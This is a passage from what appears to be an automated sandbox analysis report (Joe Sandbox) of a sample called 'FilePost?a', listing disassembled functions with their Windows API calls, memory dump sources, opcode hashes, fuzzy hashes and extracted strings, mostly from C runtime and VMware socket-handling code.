                                          • Instruction Fuzzy Hash: 8C1129362183059FDB08DF38C89067ABBA1FF84319B15842DD54747A01D3B1B902CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D187017 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6D186E95,00000000,00000000,?), ref: 6D187043
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale
                                          • String ID:
                                          • API String ID: 3736152602-0
                                          • Opcode ID: f74be3d23d83d2957045a3780d40e0fdeab768e04298a7fa207a48a26b5d6bae
                                          • Instruction ID: 5efc2307821c48705e232500a0a04bba8ba7237c90d1231a4f4f454ab8e1085a
                                          • Opcode Fuzzy Hash: f74be3d23d83d2957045a3780d40e0fdeab768e04298a7fa207a48a26b5d6bae
                                          • Instruction Fuzzy Hash: AAF04932F10116ABDB14C6A4CC05BBA7768EB51394F01042AED25A3189EBF1FD02CA90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D186980 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0BF
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0F5
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D1869D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free$InfoLocale
                                          • String ID: utf8
                                          • API String ID: 2003897158-905460609
                                          • Opcode ID: 92e3711362fbed37adc95cbcc0239782ac7a2dca0a92aad1411ece39308d1f3f
                                          • Instruction ID: cc9030fd58757e6ef137550e254f0716019843da4eb443f005b4bc189731446b
                                          • Opcode Fuzzy Hash: 92e3711362fbed37adc95cbcc0239782ac7a2dca0a92aad1411ece39308d1f3f
                                          • Instruction Fuzzy Hash: BAF02832A14209ABC714DB74DD45EBA33BCDF46314F11017AE616D7285EBF4AD048790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D186B0D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • EnumSystemLocalesW.KERNEL32(6D186DEB,00000001,?,?,-00000050,?,6D18718A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6D186B57
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 359772c1b059e2507bc697c8e1cb913399aecedb8f6354fd670edc4dd4e6b338
                                          • Instruction ID: 48b2698dc8f1c7938b6b5875b5b3fcccad01c99b41fc8717f98f73a6ed0fa1ba
                                          • Opcode Fuzzy Hash: 359772c1b059e2507bc697c8e1cb913399aecedb8f6354fd670edc4dd4e6b338
                                          • Instruction Fuzzy Hash: 2AF022723083095FD7148E348C84E7A7BA1EF8172CF05442CFA464B685C7B1AC02CA80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17EF3A Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D1776E2: EnterCriticalSection.KERNEL32(?,?,6D178FB7,?,6D1A7058,00000008,6D179130,00000001,?,?), ref: 6D1776F1
                                          • EnumSystemLocalesW.KERNEL32(6D17EF2D,00000001,6D1A7278,0000000C,6D17F2FB,00000000), ref: 6D17EF72
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID:
                                          • API String ID: 1272433827-0
                                          • Opcode ID: 28f44fc18790c939a222142a626495b6bf39a9c625dff9064488a7ce9036a960
                                          • Instruction ID: a929eda455ca7694a0d5b86170eb6fe0f2608777e38c06e67115515b9142deee
                                          • Opcode Fuzzy Hash: 28f44fc18790c939a222142a626495b6bf39a9c625dff9064488a7ce9036a960
                                          • Instruction Fuzzy Hash: 11F04972A04201DFDB10CF98E448BAC7BF1FB4A726F20411AF610DB2A4D7FA5A40CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D186A27 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • EnumSystemLocalesW.KERNEL32(6D186980,00000001,?,?,?,6D1871E8,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6D186A5E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 60acb19f0043a2febd624ebe49a282aa6b930b50584e9e6b9887ea02e7fc891c
                                          • Instruction ID: a635926abf28ae30c08854a95aca40734d93460adaa818078aa1339bc2f14a8e
                                          • Opcode Fuzzy Hash: 60acb19f0043a2febd624ebe49a282aa6b930b50584e9e6b9887ea02e7fc891c
                                          • Instruction Fuzzy Hash: 5AF0E53630420A97CB04DF75D858A7ABFA4EFC2715F0A4099EA198B655C7B29942CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17F3FF Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6D17CCB8,?,20001004,00000000,00000002,?,?,6D17C2C5), ref: 6D17F433
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: b5b5637b0b980e5df05f71c700d4f8f4e3eb7702b623b884ec74f649bcdb0949
                                          • Instruction ID: db10eef822ec47a0b43727ff6c02ba2f2a81d3f25db8a3e6a216dca36cb18e3f
                                          • Opcode Fuzzy Hash: b5b5637b0b980e5df05f71c700d4f8f4e3eb7702b623b884ec74f649bcdb0949
                                          • Instruction Fuzzy Hash: 09E04F75644218BBCF226F60DC04FAF3E2AEF56752F018011FD25A5224CBB189219AD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D151E00 Relevance: 1.5, APIs: 1, Instructions: 18encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D151E13
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ContextCryptRelease
                                          • String ID:
                                          • API String ID: 829835001-0
                                          • Opcode ID: ad69be571be5577f3ef7b8c320029c312db9c5323475bc18eef86069f3833897
                                          • Instruction ID: 3fb2a3f8830622d2c0be2538f421fcb184394f4d1c89d4eae5781ae774559802
                                          • Opcode Fuzzy Hash: ad69be571be5577f3ef7b8c320029c312db9c5323475bc18eef86069f3833897
                                          • Instruction Fuzzy Hash: FED02BB078435117D3224E185C04B8B76D89F12701F00445DB564E6184C7F4C4A0C3A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D18E680 Relevance: 1.5, APIs: 1, Instructions: 7encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6D18E68C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ContextCryptRelease
                                          • String ID:
                                          • API String ID: 829835001-0
                                          • Opcode ID: d04bdaf28cc6f2d9a70d299705e1ae762a60a6a082f50f7cf954f072f56e0b93
                                          • Instruction ID: fcce526fa931a23277404947792f75b2efc8c179a35727c22ab43da66076d8b9
                                          • Opcode Fuzzy Hash: d04bdaf28cc6f2d9a70d299705e1ae762a60a6a082f50f7cf954f072f56e0b93
                                          • Instruction Fuzzy Hash: 62B012307003015BEF10DA60AD1CB113EBC6746702F3040407015E2080CBF4D400CA14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D18494E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: e92e242e822031fc3b1de633f917a067e961fb0bd927665d566a1fe043731f42
                                          • Instruction ID: 5105236abe994ce259d71bbb8a95215980e006cda8ee141f59a4369573f1861d
                                          • Opcode Fuzzy Hash: e92e242e822031fc3b1de633f917a067e961fb0bd927665d566a1fe043731f42
                                          • Instruction Fuzzy Hash: 0DA011302022008F8B008E30A38830A3BBAAA0BAA23080028A208C8000EBE880A08B02
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1837F3 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4cd1f5f6c7ee214ed9d0984c116d247a332e82ba7d9299b1f3daff287e58b7e
                                          • Instruction ID: d1a327476482d3ccd68fd2ee7ec9383172e21fbab04d748f8607be1906b88c17
                                          • Opcode Fuzzy Hash: b4cd1f5f6c7ee214ed9d0984c116d247a332e82ba7d9299b1f3daff287e58b7e
                                          • Instruction Fuzzy Hash: 16E08C32A11638EBCB10CBC8C900A9AB3FCEB46B00B154296F611D3115C2B0DE01CBC0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39A0BB Relevance: 75.6, APIs: 11, Strings: 32, Instructions: 362COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                          • String ID: volatile$0!9n$8 9n$<unknown>$UNKNOWN$Y9n$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                          • API String ID: 1464150960-2368726167
                                          • Opcode ID: d1c613efc02a5923961ce54806f938abf135803f515d52d4be581884efcc0922
                                          • Instruction ID: cd5890df6441b3808bdcba91b796d07ca313b9c2d5224f06529a452c409cdc6b
                                          • Opcode Fuzzy Hash: d1c613efc02a5923961ce54806f938abf135803f515d52d4be581884efcc0922
                                          • Instruction Fuzzy Hash: 53E179B5D0420A9FCB00CFD9D595BEFBBB8EB05304F50825AD661A7240F73A8645EFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00343710 Relevance: 40.4, APIs: 6, Strings: 17, Instructions: 194synchronizationnetworkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Warning.VMWAREBASE(?,?,00000001,?,00000000,003413A6), ref: 0034377C
                                          • WSAGetLastError.WS2_32(?,00000000,003413A6,?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00343787
                                          • WaitForSingleObject.KERNEL32(?,?,?,00000000,003413A6), ref: 003437A8
                                          • Warning.VMWAREBASE(?,?,UTF-8,?,00000000,003413A6), ref: 003438A0
                                            • Part of subcall function 003427C0: GetLastError.KERNEL32(?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427D8
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427F3
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,0034A850,?,?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00342807
                                            • Part of subcall function 003427C0: _printf.MSPDB140-MSVCRT ref: 00342824
                                            • Part of subcall function 003427C0: SetLastError.KERNEL32(00000000,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0034282D
                                            • Part of subcall function 00342780: Warning.VMWAREBASE(?,000000FF,00000000,00000000,?,003438C9,Data not in UTF-8 format,?,00000003,Line is not in UTF-8. Disconnecting,?,00000000,003413A6), ref: 0034278B
                                            • Part of subcall function 00342780: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000005,Data dump: %s,00000000,00000005,%s,00000003,?,000000FF,00000000,00000000,?,003438C9,Data not in UTF-8 format,?,00000003), ref: 003427AF
                                          • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,003413A6), ref: 003438FC
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,003413A6), ref: 00343919
                                          Strings
                                          • Buffer full. Disconnecting., xrefs: 003437D8
                                          • Input incorrectly terminated., xrefs: 0034387C
                                          • Line missing \r, xrefs: 00343872
                                          • Read a \n without a corresponding \r. Disconnecting., xrefs: 0034385F
                                          • UTF-8, xrefs: 00343899
                                          • Short response (%d). Disconnecting., xrefs: 00343831
                                          • recv timed-out waiting for data on connection. aborting., xrefs: 003437FB
                                          • %s(): reading from closed socket., xrefs: 00343977
                                          • Overflowed buffer, xrefs: 003437E7
                                          • recv() FAIL: %d., xrefs: 00343810
                                          • Input too large., xrefs: 003437F1
                                          • Data not in UTF-8 format, xrefs: 003438BF
                                          • Input not in UTF-8 encoding., xrefs: 003438C9
                                          • VMAuthdSocketRead, xrefs: 003438DD, 00343972
                                          • Input incorrectly terminated., xrefs: 00343840
                                          • Line is not in UTF-8. Disconnecting, xrefs: 003438B0
                                          • %s: read failed. Closing socket for reading., xrefs: 003438E2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Warning$ErrorLast$CloseHandleObjectSingleWait_printffree
                                          • String ID: %s(): reading from closed socket.$%s: read failed. Closing socket for reading.$Buffer full. Disconnecting.$Data not in UTF-8 format$Input incorrectly terminated.$Input incorrectly terminated.$Input not in UTF-8 encoding.$Input too large.$Line is not in UTF-8. Disconnecting$Line missing \r$Overflowed buffer$Read a \n without a corresponding \r. Disconnecting.$Short response (%d). Disconnecting.$UTF-8$VMAuthdSocketRead$recv timed-out waiting for data on connection. aborting.$recv() FAIL: %d.
                                          • API String ID: 974896413-2831141954
                                          • Opcode ID: 3b8ea02432f3bb318d5d2f5db5a90218a8ab7c6149e29c24b7d4265d0e26ca78
                                          • Instruction ID: ef9a3fe3f9b71f6d91ba4adcc12bd41206b971489ba9a99553810705c52c9906
                                          • Opcode Fuzzy Hash: 3b8ea02432f3bb318d5d2f5db5a90218a8ab7c6149e29c24b7d4265d0e26ca78
                                          • Instruction Fuzzy Hash: E9610674A40305ABDB23AB759C42BEAFBE4EF01710F004159F955AF2C3DBB0BA0497A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39B8C3 Relevance: 37.1, APIs: 20, Strings: 1, Instructions: 332COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
